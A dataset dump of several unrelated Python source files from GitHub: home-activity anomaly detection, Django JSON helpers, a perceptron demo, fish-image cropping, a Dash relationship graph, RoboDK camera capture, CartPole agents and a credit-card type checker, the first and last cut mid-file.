1\n if cnt[r] > globals()[\"mc\"+str(r+1)]:\n subNNC = subNNC + 1\n if ttl[r] > globals()[\"mt\"+str(r+1)]:\n subNNC = subNNC + 1\n if ttl[r] > ((globals()[\"av\"+str(r+1)])*1.5):\n subNNC = subNNC + 1\n if ttl[r] < ((globals()[\"av\"+str(r+1)])*0.5):\n subNNC = subNNC + 1\n if (globals()[\"c\"+str(r+1)]) > 12 and cnt[r] < 1:\n subNNC = subNNC + 1\n if (globals()[\"c\"+str(r+1)]) < 3 and cnt[r] > 0:\n subNNC = subNNC + 1\n return subNNC\n#.............////////////////////..............\n\n#In this section, the datasets of the days should be entered in order\n\nfor i in range(15):\n globals()[\"df0\" + str(i+1)] = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n\nw0 = df01.append(df02, ignore_index=True)\nfor j in range(12):\n globals()[\"w\"+str(j+1)] = globals()[\"w\"+str(j)].append(globals()[\"df0\" + str(j+3)] , ignore_index=True)\n if j==11:\n dataR10 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR11 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR20 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n dataR21 = globals()[\"w\"+str(j+1)].append(globals()[\"df0\" + str(j+4)] , ignore_index=True)\n\nprint(\"\\nWELCOME\\n\")\n\n## ------------------------------------------------------ Resident 1 --------------------------------------------------\n\ndt11 = tree.DecisionTreeClassifier(criterion='gini') \ny11 = dataR11.r1\ndataR11.drop(['r1'], axis=1 , inplace = True)\nx11 = dataR11\ndt11.fit(x11,y11)\n\ndt10 = tree.DecisionTreeClassifier(criterion='gini') \ny10 = dataR10.r1\ndataR10.drop(['r1'], axis=1 , inplace = True)\ndataR10.drop(['r2'], axis=1 , inplace = True)\nx10 = dataR10\ndt10.fit(x10,y10)\n\nsubNNC11 = []\nsubNNC21 = []\nsubNNC10 = []\nsubNNC20 = []\nsubNNC3 = []\nsubNNC4 = []\nsubNNC5 = []\n\n#In this section, the 16th to the 30th days are called for review\n\nfor daycounter in range(15):\n \n#sub-NNC for Resident 1, Considering the behavior of the resident 2 in the last 15 days:\n dataSetsNNC11 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC11 = randomcheck(dataSetsNNC11,1,11)\n subNNC11.append(sbNNC11)\n dataSetsNNC21 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC21 = checkpred(dataSetsNNC21,1,11)\n subNNC21.append(sbNNC21)\n \n#sub-NNC for Resident 1, Regardless of resident behavior 2 in the last 15 days:\n dataSetsNNC10 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC10 = randomcheck(dataSetsNNC10,1,10)\n subNNC10.append(sbNNC10)\n dataSetsNNC20 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC20 = checkpred(dataSetsNNC20,1,10)\n subNNC20.append(sbNNC20)\n\n dataSetsNNC3 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC3 = numericalCheck(dataSetsNNC3,1)\n subNNC3.append(sbNNC3)\n dataSetsNNC4 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC4 = MaxMincheck(dataSetsNNC4,1)\n subNNC4.append(sbNNC4)\n dataSetsNNC5 = pd.read_csv('c://DAY_0'+str(daycounter+16)+'.csv' , encoding = 'ansi')\n sbNNC5 = norm(dataSetsNNC5,1)\n subNNC5.append(sbNNC5)\n\n#************************************************ FINAL NNC FOR RESIDENT 1 ************************************************ \n\nDailyNNC1 = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\nfor i in range(15):\n DailyNNC1[i] = subNNC11[i]+subNNC21[i]+subNNC10[i]+subNNC20[i]+subNNC3[i]+subNNC4[i]+subNNC5[i]\nNNC1 = np.mean(DailyNNC1)\nfor i in range(15):\n if DailyNNC1[i] > (NNC1*1.3):\n print(\"on\",i+16,\"day Abnormal state was diagnosed for the Resident 1\")\n\n\nprint(DailyNNC1)\nprint(\"Final Average NNC for Resident 1 in the last 15 days : \",NNC1)\n\n#*************************************************************************************************************************\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"seyedkazemi/NNC","sub_path":"NNC-semicode-v1.py","file_name":"NNC-semicode-v1.py","file_ext":"py","file_size_in_byte":14275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34681160389","text":"\"\"\"\nThe functions that adapts a queryset in JSONs to use by frontend\n\ncontains:\n user_lister\n requested_user_lister\n event_lister\n category_lister\n subcategory_lister\n product_lister\n transaction_lister\n donateIn_lister\n needRequest_lister\n\"\"\"\n\n\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom App1.Components.item_functions import *\n\n\ndef user_lister(user_queryset):\n user_json = {}\n for user in user_queryset:\n user_json[user.id] = user_item(user)\n\n return user_json\n\n\ndef requested_user_lister(needy_queryset, donator_queryset, pagination_params=None):\n if pagination_params:\n return error(\"TODO\", {\"message\": \"Have no pagination yet; coming soon\"})\n\n needy_json = user_lister(needy_queryset)\n donator_json = user_lister(donator_queryset)\n\n empty_needy = [0 if len(needy_json) else 1]\n empty_donator = [0 if len(donator_json) else 1]\n\n final_json = {\"success\": \"1\",\n \"empty_needy\": empty_needy[0],\n \"empty_donator\": empty_donator[0],\n \"pagination_params\": pagination_params,\n \"needy_set\": needy_json,\n \"donator_set\": donator_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef event_lister(event_queryset, pagination_params=None):\n \"\"\"\n it passes pagination params to front if exists\n \"\"\"\n # Create a json for an event:\n event_json = {}\n for event in event_queryset:\n event_json[event.id] = event_item(event)\n\n empty = [0 if len(event_json) else 1]\n final_json = {\"success\": \"1\",\n \"empty\": empty[0],\n \"pagination_params\": pagination_params,\n \"event_set\": event_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef category_lister(category_queryset):\n category_json = {}\n for category in category_queryset:\n category_json[category.id] = category_item(category)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(category_json) else 1][0],\n \"count\": len(category_queryset),\n # \"pagination_params\": pagination_params,\n \"category_set\": category_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef subcategory_lister(subcategory_queryset):\n subcategory_json = {}\n for subcategory in subcategory_queryset:\n subcategory_json[subcategory.id] = subcategory_item(subcategory)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(subcategory_json) else 1][0],\n \"count\": len(subcategory_queryset),\n # \"pagination_params\": pagination_params,\n \"subcategory_set\": subcategory_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef product_lister(product_queryset):\n product_json = {}\n for product in product_queryset:\n product_json[product.id] = product_item(product)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(product_json) else 1][0],\n \"count\": len(product_queryset),\n # \"pagination_params\": pagination_params,\n \"product_set\": product_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef transaction_lister(transaction_queryset):\n transaction_json = {}\n for transaction in transaction_queryset:\n transaction_json[transaction.id] = transaction_item(transaction)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(transaction_json) else 1][0],\n \"count\": len(transaction_queryset),\n # \"pagination_params\": pagination_params,\n \"transaction_set\": transaction_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef donateIn_lister(donates_queryset):\n donate_json = {}\n for donate in donates_queryset:\n donate_json[donate.id] = donateIn_item(donate)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(donate_json) else 1][0],\n \"count\": len(donates_queryset),\n # \"pagination_params\": pagination_params,\n \"donate_set\": donate_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n\n\ndef needRequest_lister(needRequest_queryset):\n needRequest_json = {}\n for needRequest in needRequest_queryset:\n needRequest_json[needRequest.id] = needRequest_item(needRequest)\n\n final_json = {\"success\": \"1\",\n \"empty\": [0 if len(needRequest_json) else 1][0],\n \"count\": len(needRequest_queryset),\n # \"pagination_params\": pagination_params,\n \"needRequest_set\": needRequest_json}\n\n return Response(final_json,\n status=status.HTTP_200_OK)\n","repo_name":"ehsankarbasian/django_charity","sub_path":"Backend/App1/Components/lister_functions.py","file_name":"lister_functions.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39181479223","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nfrom numpy import loadtxt\n \n# check error Pocket \ndef check_errorP(w, x ,label):\n if int(np.sign(w.T.dot(x))) != label:\n return True\n else :\n return False\n \n# get num of total error in dataset \ndef sum_error(w, dataset):\n errors = 0\n for x, label in dataset:\n if check_errorP(w, x, label):\n errors += 1\n return errors\n\n# Pocket演算法實作\ndef pocket(dataset):\n w = np.zeros(3) \n iterp = 0\n premisclassified = sum_error(w,dataset)\n bestw = 0\n \n for iterp in range(0,100000):\n misclassified = None\n while True:\n x, label = random.choice(dataset) # random choose samples\n if check_errorP(w,x,label):\n x = np.array(x)\n w = w + label * x\n misclassified = sum_error(w,dataset)\n break\n \n if misclassified < premisclassified: # misclassified smaller than premisclassified\n bestw = w\n premisclassified = misclassified\n \n iterp = iterp + 1 \n #w = bestw\n if premisclassified == 0:\n break\n print(\"iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n if premisclassified == 0 :\n print(\"!!halt!! iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n else :\n print(\"!!iter done!! iter: %d , misclassified: %d , best misclassified: %d\" % (iterp,misclassified , premisclassified))\n print(\"Accuracy :\" , ((samples-premisclassified)/samples)*100, \"%\")\n return bestw , iterp \n\nif __name__ == '__main__': \n m, b = 3, 10 # set the value of m and b\n print(\"the num of total samples : \")\n samples = int(input()) # the num of samples\n x = np.arange(samples)\n y = m * x + b\n plt.plot(x, y,'-y',label = 'Original')\n half = int(samples / 2)\n data = np.load('dataset.npz')\n dataset = list(zip(data['a'],data['b'],data['c'])) \n dataset = list(zip(dataset,data['z']))\n x0 = data['a']\n xdata = data['b']\n ydata = data['c']\n label = data['z'] \n print(\"Pocket:\") \n start1 = time.time() \n wbest , iterp = pocket(dataset)\n end1 = time.time()\n print(\"num of iterations: \",iterp)\n print(\"執行時間:%f 秒\"% float(end1-start1))\n l = np.arange(samples)\n ap,bp = -wbest[1]/wbest[2], -wbest[0]/wbest[2]\n print(\"m: %f, b: %f\" % (ap,bp))\n plt.plot(l, ap*l + bp, 'g-',label = 'Pocket')\n plt.plot(xdata[:half], ydata[:half], '.', color='blue',label='positive')\n plt.plot(xdata[half:], ydata[half:], 'x', color='red',label='negative')\n plt.legend(loc='upper left');\n plt.show()\n","repo_name":"nianyinwu/Perceptron","sub_path":"Pocket.py","file_name":"Pocket.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12481332825","text":"import cv2\nimport skvideo.io\nimport pandas as pd\nimport numpy as np\nimport tqdm\n\n\nspecies_list = ['species_fourspot',\n 'species_grey sole',\n 'species_other',\n 'species_plaice',\n 'species_summer',\n 'species_windowpane',\n 'species_winter']\ndf = pd.read_csv('../../data/training.csv')\n\ndef process_row(row,frame,class_name, display=False, bounding_pad=2):\n x1, x2, y1, y2 = map(int, row[['x1', 'x2', 'y1', 'y2']].as_matrix())\n length = row['length']\n if length < 100:\n delta = 50\n elif length >= 100 and length < 150:\n delta = 75\n elif length >= 150 and length < 200:\n delta = 100\n elif length >= 200 and length < 250:\n delta = 125\n elif length >= 250 and length < 300:\n delta = 150\n elif length >= 300 and length < 350:\n delta = 175\n else:\n delta = int(length//2)\n \n delta += bounding_pad\n mid_x = int(x1 + x2)//2\n mid_y = int(y1 + y2)//2\n max_y, max_x, ch = frame.shape\n start_x = max(0, mid_x-delta)\n start_y = max(0, mid_y-delta)\n end_x = min(mid_x+delta, max_x)\n end_y = min(mid_y+delta, max_y)\n \n image = np.copy(frame)\n cropped_image = np.copy(image)[start_y:end_y,start_x:end_x]\n \n if display:\n pass\n else:\n return cropped_image\n\ndef process_video(df, video_index,skip=None,display_frames=True):\n if type(video_index)==str:\n x = df[df['video_id']==video_index].dropna()\n else:\n videos = df['video_id'].unique()\n x = df[df['video_id']==videos[video_index]].dropna()\n m = x['video_id'].iloc[0]\n base_path = '../../data/train_videos/'\n x['species'] = x.apply(lambda row: row[species_list].argmax(), axis=1)\n max_frame = x['frame'].max()\n vid_generator = skvideo.io.FFmpegReader(base_path + m + '.mp4')\n counter = -1\n outer_counter = 0\n images = []\n for i, row in x.iterrows():\n target_frame = row['frame']\n for f in vid_generator.nextFrame():\n frame = f\n counter +=1\n if counter == target_frame:\n break\n if skip:\n if outer_counter % skip == 0:\n ret = process_row(row,frame,row['species'], display=display_frames, bounding_pad=20)\n else:\n ret = process_row(row,frame,row['species'], display=display_frames, bounding_pad=20)\n if display_frames == False:\n images.append(ret)\n outer_counter += 1\n return images\n\n\ntotal_counter = 0\nall_videos = videos = df['video_id'].unique()\nbase_im_folder = '../../data/binary_classification/fish/'\n\nfor video in tqdm.tqdm(all_videos):\n try:\n u = process_video(df, video, None, False)\n for img in u:\n fname = base_im_folder + '{}.png'.format(total_counter)\n total_counter+=1\n cv2.imwrite(fname, cv2.cvtColor(img, cv2.COLOR_RGB2BGR))\n except Exception as e:\n print(\"cant process {}\".format(video))\n pass\n\n\n\n","repo_name":"aditbiswas1/fish-detection","sub_path":"preprocess_data/generate_fish_for_binary.py","file_name":"generate_fish_for_binary.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"819045045","text":"import matplotlib\nmatplotlib.use('Agg')\nimport math\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport io\nimport base64\n\n# Entity Class\nclass Entity:\n def __init__(self, name, type):\n self.name = name\n self.type = type\n self.relations = {}\n\n def add_relation(self, relation, target):\n if relation not in self.relations:\n self.relations[relation] = []\n if target not in self.relations[relation]:\n self.relations[relation].append(target)\n\n# Load CSVs\nrelationships = pd.read_csv('relationships.csv')\nparticipants = pd.read_csv('participants.csv')\n\n# Initialize entities from participants.csv\nentities = {row['Name']: Entity(row['Name'], row['Type']) for _, row in participants.iterrows()}\n\n# Populate relationships from relationships.csv\nfor _, row in relationships.iterrows():\n subject_type, relationship, object_type = row['SubjectType'], row['Relationship'], row['ObjectType']\n for entity_name, entity in entities.items():\n if entity.type == subject_type:\n for target_name, target in entities.items():\n if target.type == object_type:\n entity.add_relation(relationship, target_name)\n\n# Dash App\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])\n\nparticipants_options = [{'label': entity.name, 'value': entity.name} for entity in entities.values()]\nrelationship_options = list(set([rel for entity in entities.values() for rel in entity.relations]))\nrelation_types = relationships['RelationType'].unique()\n\napp.layout = dbc.Container([\n html.H1(\"Relationship Viewer\"),\n dbc.Row([\n dbc.Col([\n html.Label(\"Select Participants:\"),\n dcc.Dropdown(id='participants-dropdown', options=participants_options, multi=True, value=list(entities.keys())),\n ], width=4),\n dbc.Col([\n html.Label(\"Select type of relation:\"),\n dcc.Dropdown(id='relation-type-dropdown', options=[{'label': rel_type, 'value': rel_type} for rel_type in relation_types], multi=True),\n ], width=4),\n dbc.Col([\n html.Label(\"Select Relationships:\"),\n dcc.Dropdown(id='relationships-dropdown', multi=True, value=relationship_options),\n ], width=4),\n ]),\n dbc.Row([\n dbc.Col([\n dbc.Button(\"Run\", id=\"run-btn\", color=\"primary\", className=\"mt-2\")\n ], width=2)\n ]),\n dbc.Row([\n dbc.Col([\n html.Img(id='network-graph', className=\"mt-4\")\n ])\n ]),\n], fluid=True)\n\ndef generate_layout(G):\n pos = nx.spring_layout(G)\n for node, data in G.nodes(data=True):\n if data['type'] == 'Human':\n r = 2\n angle = hash(node) % 360\n pos[node] = (r * math.cos(math.radians(angle)), r * math.sin(math.radians(angle)))\n return pos\n\n@app.callback(\n Output('relationships-dropdown', 'options'),\n Output('relationships-dropdown', 'value'),\n Input('relation-type-dropdown', 'value')\n)\ndef filter_relationships_by_type(selected_relation_type):\n if not selected_relation_type:\n options = [{'label': rel, 'value': rel} for rel in relationship_options]\n return options, []\n filtered_relationships = relationships[relationships['RelationType'].isin(selected_relation_type)]\n available_relations = filtered_relationships['Relationship'].unique()\n options = [{'label': rel, 'value': rel} for rel in available_relations]\n return options, list(available_relations)\n\n@app.callback(\n Output('network-graph', 'src'),\n Input('run-btn', 'n_clicks'),\n Input('participants-dropdown', 'value'),\n Input('relationships-dropdown', 'value')\n)\ndef update_output(n_clicks, selected_participants, selected_relationships):\n if n_clicks is None:\n return dash.no_update\n\n G = nx.DiGraph()\n color_map = {\n \"Human\": \"red\",\n \"Food\": \"yellow\",\n \"Animal\": \"blue\",\n \"Pet\": \"orange\",\n \"Toy\": \"green\",\n \"Vehicle\": \"purple\"\n }\n\n for entity_name in selected_participants:\n entity = entities[entity_name]\n G.add_node(entity.name, type=entity.type)\n\n for entity_name in selected_participants:\n entity = entities[entity_name]\n for relation, targets in entity.relations.items():\n if relation not in selected_relationships:\n continue\n for target in targets:\n if target in selected_participants:\n G.add_edge(entity.name, target, relation=relation)\n\n pos = nx.shell_layout(G) # or any other layout you prefer\n node_colors = [color_map.get(data['type'], \"gray\") for node, data in G.nodes(data=True)]\n labels = nx.get_edge_attributes(G, 'relation')\n \n non_self_edges = [(u, v) for u, v in G.edges() if u != v]\n\n # 1. Adjust label position for curved edges.\n # This creates an offset for edge labels. The values can be fine-tuned for best visual result.\n label_pos = {}\n for u, v, data in G.edges(data=True):\n if u != v: # Only for non-self-edges\n x0, y0 = pos[u]\n x1, y1 = pos[v]\n label_pos[(u, v)] = ((x0 + x1) / 2 + (y1 - y0) * 0.2, (y0 + y1) / 2 + (x0 - x1) * 0.2)\n\n # 2. Color the labels based on the target node (object) of the edge.\n label_colors = {(u, v): color_map[G.nodes[v]['type']] for u, v in non_self_edges}\n\n edge_colors = [color_map[G.nodes[v]['type']] for u, v in G.edges() if u != v]\n\n plt.figure(figsize=(10, 6))\n \n # Draw the nodes and non-self-edges with the specified edge colors and curved arrows\n nx.draw(G, pos, with_labels=True, node_size=2000, node_color=node_colors, font_size=10, width=2, alpha=0.6, edge_color=edge_colors, arrowsize=20, edgelist=non_self_edges, connectionstyle=\"arc3,rad=0.2\")\n\n # Filter edge labels\n filtered_labels = {(u, v): d for (u, v), d in labels.items() if u != v and u in pos and v in pos}\n \n # Filter the label_colors to match the filtered_labels\n filtered_label_colors = [label_colors[edge] for edge in filtered_labels.keys()]\n\n for edge, color in zip(filtered_labels.keys(), filtered_label_colors):\n label = filtered_labels[edge]\n x, y = pos[edge[0]]\n x2, y2 = pos[edge[1]]\n x_avg, y_avg = (x + x2) / 2, (y + y2) / 2 # Midpoint of the edge\n\n plt.text(x_avg, y_avg, label, color=color)\n\n buf = io.BytesIO()\n plt.savefig(buf, format=\"png\")\n buf.seek(0)\n base64_image = base64.b64encode(buf.getvalue()).decode('utf-8')\n\n return \"data:image/png;base64,{}\".format(base64_image)\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8050)\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8050)","repo_name":"PedroNVSRamos/relationships-visualization-rug","sub_path":"relationships.py","file_name":"relationships.py","file_ext":"py","file_size_in_byte":6848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"16439041057","text":"\nfrom robodk import robolink \nfrom robodk import robomath \nimport numpy as np\nimport cv2 as cv\nimport os\nimport pandas as pd\n\n\nif __name__ == '__main__':\n RDK = robolink.Robolink()\n CAM_NAME = 'My Camera'\n CAM_PARAMS = 'SIZE=640x480'\n WINDOW_NAME = 'My Camera Feed'\n BASE_PATH = '/Users/akshitshishodia/tracker/roboDK /test2/test'\n data = pd.DataFrame(columns=['name','joint_pose'])\n cnt = 0 \n\n\n inventory = RDK.Item('inventory')\n cam_item = RDK.Item(CAM_NAME, robolink.ITEM_TYPE_CAMERA)\n if not cam_item.Valid():\n cam_item = RDK.Cam2D_Add(RDK.AddFrame(CAM_NAME + ' Frame'), CAM_PARAMS)\n cam_item.setName(CAM_NAME)\n cam_item.setParam('Open', 1)\n\n while cam_item.setParam('isOpen') == '1':\n\n img_socket = None\n bytes_img = RDK.Cam2D_Snapshot('', cam_item)\n joint_pose = inventory.Joints()\n\n if isinstance(bytes_img, bytes) and bytes_img != b'':\n nparr = np.frombuffer(bytes_img, np.uint8)\n img_socket = cv.imdecode(nparr, cv.IMREAD_COLOR)\n if img_socket is None:\n break\n name = str(cnt)+ \".png\"\n path = os.path.join(BASE_PATH,name)\n cv.imwrite(path,img_socket)\n data = data.append({'name':name,'joint_pose':joint_pose[0][0]},ignore_index = True)\n data.to_csv(\"name_and_pose2.csv\")\n cnt+=1\n cv.imshow(WINDOW_NAME, img_socket)\n\n\n\n cv.destroyAllWindows()\n RDK.Cam2D_Close(cam_item)\n","repo_name":"Akshit0601/Anomaly-Detection","sub_path":"roboDK /main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"18982530294","text":"import gym\nimport misc.controller as ctrl\nfrom misc.agents import learning, linear\nimport matplotlib.pyplot as plt\n\nenv = gym.make('CartPole-v0')\n\np = 0.5\nn = 1000\nn_average = 100\nrender = False\n\nagent_a = learning.LearningAgent(\n learning_type=learning.LearningType.MONTECARLO)\nagent_b = learning.LearningAgent(learning_type=learning.LearningType.QLEARNING)\nagent_c = linear.LearningLinearAgent()\na = ctrl.Controller(env, agent_a)\nb = ctrl.Controller(env, agent_b)\nc = ctrl.Controller(env, agent_c)\nc.run_episodes(n, render=render, p_noise=p)\na.run_episodes(n, render=render, p_noise=p)\nb.run_episodes(n, render=render, p_noise=p)\n\nya = a.stats.getRollingAverage(n_average)\nyb = b.stats.getRollingAverage(n_average)\nyc = c.stats.getRollingAverage(n_average)\nx = range(len(ya))\nplt.plot(x, ya, x, yb, x, yc)\nplt.title(\"p = 0.5\")\nplt.show()\n\n# env.close()\n","repo_name":"tdardinier/InterGP","sub_path":"src/temp/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37686218512","text":"import re\n\ndef is_hipercard(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^606282|3841\\d{2}',''.join(n[:6])):\n return True\n return False\n\ndef is_dankort(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^(5019)\\d+$',n):\n return True\n return False\n\ndef is_bcglobal(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^(6541|6556)[0-9]{12}$',n):\n return True\n return False\n\ndef is_koreancard(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^9[0-9]{15}$',n):\n return True\n return False\n\ndef is_carteblanche(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 19:\n if re.match('^389[0-9]{11}$',n):\n return True\n return False\n\ndef is_instapayment(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 16 and length <= 19:\n if re.match('^(6360)\\d+$',n) or re.match('^63[7-9][0-9]{13}$',n):\n return True\n return False\n\ndef is_laser(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6706','6709','6771']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form or re.match('^(6304|6706|6709|6771)[0-9]{12,15}$',n):\n return True\n return False\n\n\ndef is_bcmc(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6703']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_solo(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['6334','6767']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form or re.match('^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$',n):\n return True\n return False\n\ndef is_switch(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['633110','633312','633304','633303','633301','633300']\n if length >= 16 and length <= 19:\n if ''.join(n[:6]) in form or re.match('^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$',n):\n return True\n return False\n\ndef is_jcb(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length == 16:\n if ''.join(n[:4]) in strings_between(3528, 3589)or re.match('^(?:2131|1800|35\\d{3})\\d{11}$',n):\n return True\n return False\n\ndef is_unionpay(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 12 and length <= 19:\n if re.match('^(62|88)\\d+$',n) or re.match('^(62[0-9]{14,17})$',n):\n return True\n return False\n\ndef is_visa(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 13 and length <= 16:\n if n[0] == '4':\n if(re.match('^4[0-9]{12}(?:[0-9]{3})?$',n)):\n return True\n return False\n\ndef is_dinersclub(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['30','36']\n if length >= 13 and length <= 19:\n if ''.join(n[:2]) in form or (re.match('^3(?:0[0-5]|[68][0-9])[0-9]{11}$',n)):\n return True\n return False\n\ndef is_cartebancaire(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['4035','4360']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_vpay(n):\n \"\"\"Checks if credit card number fits the visa format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['4370','482']\n if length >= 13 and length <= 19:\n if ''.join(n[:4]) in form or ''.join(n[:3]) in form:\n return True\n return False\n\ndef is_visa_electron(n):\n \"\"\"Checks if credit card number fits the visa electron format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['026', '508', '844', '913', '917','405']\n\n if length == 16:\n if n[0] == '4':\n if ''.join(n[1:4]) in form or ''.join(n[1:6]) == '17500':\n return True\n return False\n\n\ndef is_mastercard(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length >= 16 and length <= 19:\n if ''.join(n[:2]) in strings_between(50, 56) or (re.match('^5[1-5][0-9]{14}$',n)):\n return True\n return False\n\ndef is_rupay(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n if length >= 13 and length <= 19:\n if ''.join(n[:6]) in strings_between(508500, 508999) or ''.join(n[:6]) in strings_between(606985, 607984) or ''.join(n[:6]) in strings_between(608001, 608500) or ''.join(n[:6]) in strings_between(652150, 653149):\n return True\n return False\n\n\ndef is_elo(n):\n \"\"\"Checks if credit card number fits the mastercard format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['5066']\n if length >= 16 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n return False\n\ndef is_amex(n):\n \"\"\"Checks if credit card number fits the american express format.\"\"\"\n n, length = str(n), len(str(n))\n if length == 15:\n if n[0] == '3' and (n[1] == '4' or n[1] == '7'):\n if(re.match('^3[47][0-9]{13}$',n)):\n return True\n else:\n return False\n return False\n\n\ndef is_maestro(n):\n \"\"\"Checks if credit card number fits the maestro format.\"\"\"\n n, length = str(n), len(str(n))\n form = ['5018', '5020', '5038', '5893', '6304',\n '6759', '6761', '6762', '6763','6731',\n '06','6779','677','678','679']\n\n if length >= 12 and length <= 19:\n if ''.join(n[:4]) in form:\n return True\n elif ''.join(n[:3]) in form:\n return True;\n elif ''.join(n[:2]) in form:\n return True;\n return False\n\n\ndef is_discover(n):\n \"\"\"Checks if credit card number fits the discover card format.\"\"\"\n n, length = str(n), len(str(n))\n\n if length == 16:\n if n[0] == '6':\n if ''.join(n[1:4]) == '011' or n[1] == '5':\n return True\n elif n[1] == '4' and n[2] in strings_between(4, 10):\n return True\n elif ''.join(n[1:6]) in strings_between(22126, 22926):\n return True\n return False\n\n\ndef get_format(n):\n \"\"\"Gets a list of the formats a credit card number fits.\"\"\"\n formats = []\n\n if is_visa(n):\n 